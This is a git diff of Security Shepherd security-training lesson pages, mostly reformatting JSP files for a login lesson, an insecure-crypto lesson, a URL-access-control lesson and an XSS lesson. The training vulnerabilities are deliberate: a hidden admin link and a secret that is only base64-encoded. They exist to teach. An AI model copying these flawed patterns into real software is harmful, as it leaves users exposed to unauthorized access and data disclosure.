-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			var counter=0;
+			$("#leForm").submit(function(){
+				counter = counter + 1;
+				console.log("Counter: " + counter);
+				var theUserName = $("#userName").val();
+				var theUserPass = $("#userPass").val();
+				var theError = "";
+				$("#badData").hide("fast");
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= LEVEL_HASH %>",
+						data: {
+							userName: theUserName,
+							userPass: theUserPass
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+				if (counter == 3)
+				{
+					console.log("Showing Hint Button");
+					$("#hintButton").show("slow");
+				}
+				if (theError.length > 0)
+				{
+					$("#badData").html("<p> <%= bundle.getString("error.occurred") %>: " + theError + "</p>");
+					$("#badData").show("slow");
+				}
+			});
+			
+			$("#theHintButton").click(function() {
+				$("#hintButton").hide("fast", function(){
+					$("#hint").show("fast");
+				});
+			});;
+			
+			$('#hideLesson').click(function(){
+				$("#lessonIntro").hide("slow", function(){
+					$("#showLesson").show("fast");
+				});
+			});
+			
+			$("#showLesson").click(function(){
+				$('#showLesson').hide("fast", function(){
+					$("#lessonIntro").show("slow");
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/lessons/if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2.jsp b/src/main/webapp/lessons/if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2.jsp
index d4b0073c8..ddaab74b4 100644
--- a/src/main/webapp/lessons/if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2.jsp
+++ b/src/main/webapp/lessons/if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2.jsp
@@ -1,121 +1,128 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+	/**
+	 * <br/><br/>
+	 * This file is part of the Security Shepherd Project.
+	 *
+	 * The Security Shepherd project is free software: you can redistribute it and/or modify
+	 * it under the terms of the GNU General Public License as published by
+	 * the Free Software Foundation, either version 3 of the License, or
+	 * (at your option) any later version.<br/>
+	 *
+	 * The Security Shepherd project is distributed in the hope that it will be useful,
+	 * but WITHOUT ANY WARRANTY; without even the implied warranty of
+	 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	 * GNU General Public License for more details.<br/>
+	 *
+	 * You should have received a copy of the GNU General Public License
+	 * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
+	 *
+	 * @author Mark Denihan
+	 */
 
-    final String LEVEL_NAME = "Insecure Crypto Lesson";
-    final String LEVEL_HASH = "if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2";
+	final String LEVEL_NAME = "Insecure Crypto Lesson";
+	final String LEVEL_HASH = "if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2";
 
-    //Translation stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.insecure_crypto." + LEVEL_HASH, locale);
-    //Used more than once translations
-    String translatedLevelName = bundle.getString("title.question.insecure_crypto");
+	//Translation stuff
+	Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+	ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.insecure_crypto." + LEVEL_HASH, locale);
+	//Used more than once translations
+	String translatedLevelName = bundle.getString("title.question.insecure_crypto");
 
-    ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
-    String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
-    String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
-    String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.top10.insecureCryptoStorage");
+	ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
+	String owaspMoreInfo = 	generic.getString("module.generic.owasp.more.info");
+	String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
+	String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.top10.insecureCryptoStorage");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-%>
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
+	if (request.getSession() != null)
+	 {
+		HttpSession ses = request.getSession();
+		//Getting CSRF Token from client
+		Cookie tokenCookie = null;
+		try
+		{
+			tokenCookie = Validate.getToken(request.getCookies());
+		}
+		catch(Exception htmlE)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME +".jsp: tokenCookie Error:" + htmlE.toString());
+		}
+		// validateSession ensures a valid session, and valid role credentials
+		// If tokenCookie == null, then the page is not going to continue loading
+		if (Validate.validateSession(ses) && tokenCookie != null)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= translatedLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= translatedLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= translatedLevelName %>
-    </h2>
-    <p>
-    <div id="lessonIntro">
-        <%= bundle.getString("paragraph.info1") %>
-        <br/> <br/>
-        <%= bundle.getString("paragraph.info2") %>
-        <br/> <br/>
-        <%= owaspMoreInfo %>
-        <a href="<%= owaspUrlAttack %>" target="_blank"><%= owaspGuideTo %>
-            Insecure Crytographic Storage
-        </a> <br/> <br/> <input type="button"
-                                value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson"/>
-    </div>
-
-    <input type="button"
-           value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
-           style="display: none;"/> <br/> <br/>
-    <%= bundle.getString("challenge.description") %>
-    <br/> <br/> <a>YmFzZTY0aXNOb3RFbmNyeXB0aW9uQmFzZTY0aXNFbmNvZGluZ0Jhc2U2NEhpZGVzTm90aGluZ0Zyb21Zb3U=</a>
-    </p>
-</div>
-<script>
-    $('#hideLesson').click(function () {
-        $("#lessonIntro").hide("slow", function () {
-            $("#showLesson").show("fast");
-        });
-    });
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= translatedLevelName %></h2>
+		<p>
+		<div id="lessonIntro">
+			<%= bundle.getString("paragraph.info1") %>
+			<br /> <br />
+			<%= bundle.getString("paragraph.info2") %>
+			<br /> <br />
+			<%= owaspMoreInfo %>
+			<a href="<%= owaspUrlAttack %>" target="_blank"> <%= owaspGuideTo %>
+				Insecure Crytographic Storage
+			</a> <br /> <br /> <input type="button"
+				value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson" />
+		</div>
 
-    $("#showLesson").click(function () {
-        $('#showLesson').hide("fast", function () {
-            $("#lessonIntro").show("slow");
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<input type="button"
+			value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
+			style="display: none;" /> <br /> <br />
+		<%= bundle.getString("challenge.description") %>
+		<br /> <br /> <a>YmFzZTY0aXNOb3RFbmNyeXB0aW9uQmFzZTY0aXNFbmNvZGluZ0Jhc2U2NEhpZGVzTm90aGluZ0Zyb21Zb3U=</a>
+		</p>
+	</div>
+	<script>			
+			$('#hideLesson').click(function(){
+				$("#lessonIntro").hide("slow", function(){
+					$("#showLesson").show("fast");
+				});
+			});
+			
+			$("#showLesson").click(function(){
+				$('#showLesson').hide("fast", function(){
+					$("#lessonIntro").show("slow");
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/lessons/mobile/mobileServerLesson.jsp b/src/main/webapp/lessons/mobile/mobileServerLesson.jsp
index 7d7bf6465..dd1e882d4 100644
--- a/src/main/webapp/lessons/mobile/mobileServerLesson.jsp
+++ b/src/main/webapp/lessons/mobile/mobileServerLesson.jsp
@@ -1,36 +1,37 @@
 <%@ page contentType="text/html; charset=iso-8859-1" language="java"
-         import="utils.*" errorPage="" %>
+	import="utils.*" errorPage=""%>
 <%
-    /**
-     * Template Servlet for Mobile Levels
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     * @author Sean Duggan
-     *
-     */
-
-
+/**
+ * Template Servlet for Mobile Levels
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ * @author Sean Duggan
+ *
+ */
+ 
+ 
+ 
 %>
 
 <script>
-    if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
+if( /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent) ) {
 
 
 //Display Mobile CSS and at first, user details due to a value sent from the app.
 
-    }
+}
 
 </script>
\ No newline at end of file
diff --git a/src/main/webapp/lessons/oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3.jsp b/src/main/webapp/lessons/oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3.jsp
index 9e079a470..b25f19658 100644
--- a/src/main/webapp/lessons/oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3.jsp
+++ b/src/main/webapp/lessons/oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3.jsp
@@ -1,126 +1,133 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+	/**
+	 * <br/><br/>
+	 * This file is part of the Security Shepherd Project.
+	 *
+	 * The Security Shepherd project is free software: you can redistribute it and/or modify
+	 * it under the terms of the GNU General Public License as published by
+	 * the Free Software Foundation, either version 3 of the License, or
+	 * (at your option) any later version.<br/>
+	 *
+	 * The Security Shepherd project is distributed in the hope that it will be useful,
+	 * but WITHOUT ANY WARRANTY; without even the implied warranty of
+	 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	 * GNU General Public License for more details.<br/>
+	 *
+	 * You should have received a copy of the GNU General Public License
+	 * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
+	 *
+	 * @author Mark Denihan
+	 */
 
-    final String LEVEL_NAME = "Failure to Restrict URL Access Lesson";
-    final String LEVEL_HASH = "oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3";
+	final String LEVEL_NAME = "Failure to Restrict URL Access Lesson";
+	final String LEVEL_HASH = "oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3";
 
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.failure_to_restrict_url_access." + LEVEL_HASH, locale);
-    //Used more than once translations
-    String translatedLevelName = bundle.getString("title.question.fail_restrict_url_acc");
+	//Translation Stuff
+	Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+	ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.failure_to_restrict_url_access." + LEVEL_HASH, locale);
+	//Used more than once translations
+	String translatedLevelName = bundle.getString("title.question.fail_restrict_url_acc");
 
-    ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
-    String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
-    String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
-    String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.top10.failureToRestrictUrlAccess");
+	ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
+	String owaspMoreInfo = 	generic.getString("module.generic.owasp.more.info");
+	String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
+	String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.top10.failureToRestrictUrlAccess");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
+	if (request.getSession() != null)
+	 {
+		HttpSession ses = request.getSession();
+		//Getting CSRF Token from client
+		Cookie tokenCookie = null;
+		try
+		{
+			tokenCookie = Validate.getToken(request.getCookies());
+		}
+		catch(Exception htmlE)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME +".jsp: tokenCookie Error:" + htmlE.toString());
+		}
+		// validateSession ensures a valid session, and valid role credentials
+		// If tokenCookie == null, then the page is not going to continue loading
+		if (Validate.validateSession(ses) && tokenCookie != null)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 
-%>
+ %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= translatedLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= translatedLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= translatedLevelName %>
-    </h2>
-    <p>
-    <div id="lessonIntro">
-        <%= bundle.getString("paragraph.info1") %>
-        <br/> <br/>
-        <%= bundle.getString("paragraph.info2") %>
-        <br/> <br/>
-        <%= owaspMoreInfo %>
-        <a href="<%= owaspUrlAttack %>" target="_blank"><%= owaspGuideTo %>
-            Failure to Restrict URL Access
-        </a> <br/> <br/> <input type="button"
-                                value="<%= bundle.getString("button.hideLesson") %>" id="hideLesson"/>
-    </div>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= translatedLevelName %></h2>
+		<p>
+		<div id="lessonIntro">
+			<%= bundle.getString("paragraph.info1") %>
+			<br /> <br />
+			<%= bundle.getString("paragraph.info2") %>
+			<br /> <br />
+			<%= owaspMoreInfo %>
+			<a href="<%= owaspUrlAttack %>" target="_blank"> <%= owaspGuideTo %>
+				Failure to Restrict URL Access
+			</a> <br /> <br /> <input type="button"
+				value="<%= bundle.getString("button.hideLesson") %>" id="hideLesson" />
+		</div>
 
-    <input type="button"
-           value="<%= bundle.getString("button.showLesson") %>" id="showLesson"
-           style="display: none;"/> <br/> <br/>
-    <%= bundle.getString("challenge.description") %>
-    <div id="hiddenDiv" style="display: none;">
-        <!-- <%= bundle.getString("challenge.adminComment") %> -->
-        <a href="adminOnly/resultKey.jsp"><%= bundle.getString("challenge.adminLink") %>
-        </a>
-    </div>
-    </p>
-</div>
-<script>
-    $('#hideLesson').click(function () {
-        $("#lessonIntro").hide("slow", function () {
-            $("#showLesson").show("fast");
-        });
-    });
+		<input type="button"
+			value="<%= bundle.getString("button.showLesson") %>" id="showLesson"
+			style="display: none;" /> <br /> <br />
+		<%= bundle.getString("challenge.description") %>
+		<div id="hiddenDiv" style="display: none;">
+			<!-- <%= bundle.getString("challenge.adminComment") %> -->
+			<a href="adminOnly/resultKey.jsp"> <%= bundle.getString("challenge.adminLink") %>
+			</a>
+		</div>
+		</p>
+	</div>
+	<script>
+			$('#hideLesson').click(function(){
+				$("#lessonIntro").hide("slow", function(){
+					$("#showLesson").show("fast");
+				});
+			});
 
-    $("#showLesson").click(function () {
-        $('#showLesson').hide("fast", function () {
-            $("#lessonIntro").show("slow");
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+			$("#showLesson").click(function(){
+				$('#showLesson').hide("fast", function(){
+					$("#lessonIntro").show("slow");
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/lessons/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a.jsp b/src/main/webapp/lessons/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a.jsp
index 98c944436..e45ff2308 100644
--- a/src/main/webapp/lessons/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a.jsp
+++ b/src/main/webapp/lessons/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a.jsp
@@ -1,182 +1,190 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 
 <%
-    /**
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     */
+	/**
+	 * This file is part of the Security Shepherd Project.
+	 *
+	 * The Security Shepherd project is free software: you can redistribute it and/or modify
+	 * it under the terms of the GNU General Public License as published by
+	 * the Free Software Foundation, either version 3 of the License, or
+	 * (at your option) any later version.<br/>
+	 *
+	 * The Security Shepherd project is distributed in the hope that it will be useful,
+	 * but WITHOUT ANY WARRANTY; without even the implied warranty of
+	 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	 * GNU General Public License for more details.<br/>
+	 *
+	 * You should have received a copy of the GNU General Public License
+	 * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
+	 */
 
-    final String levelName = "Cross Site Scripting Lesson";
-    final String levelHash = "zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a";
+	final String levelName = "Cross Site Scripting Lesson";
+	final String levelHash = "zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a";
 
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.xss." + levelHash, locale);
-    //Used more than once translations
-    String translatedLevelName = bundle.getString("title.question.xss");
+	//Translation Stuff
+	Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+	ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.xss." + levelHash, locale);
+	//Used more than once translations
+	String translatedLevelName = bundle.getString("title.question.xss");
 
-    ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
-    String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
-    String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
-    String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.attack.xss");
+	ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
+	String owaspMoreInfo = 	generic.getString("module.generic.owasp.more.info");
+	String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
+	String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.attack.xss");
+ 
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+	if (request.getSession() != null)
+	{
+		HttpSession ses = request.getSession();
+		//Getting CSRF Token from client
+		Cookie tokenCookie = null;
+		try
+		{
+			tokenCookie = Validate.getToken(request.getCookies());
+		}
+		catch(Exception htmlE)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+		}
+		// validateSession ensures a valid session, and valid role credentials
+		// If tokenCookie == null, then the page is not going to continue loading
+		if (Validate.validateSession(ses) && tokenCookie != null)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+			// Getting Session Variables
+			//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            // Getting Session Variables
-            //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
-
-            String csrfToken = Encode.forHtml(tokenCookie.getValue());
+			String csrfToken = Encode.forHtml(tokenCookie.getValue());
 %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
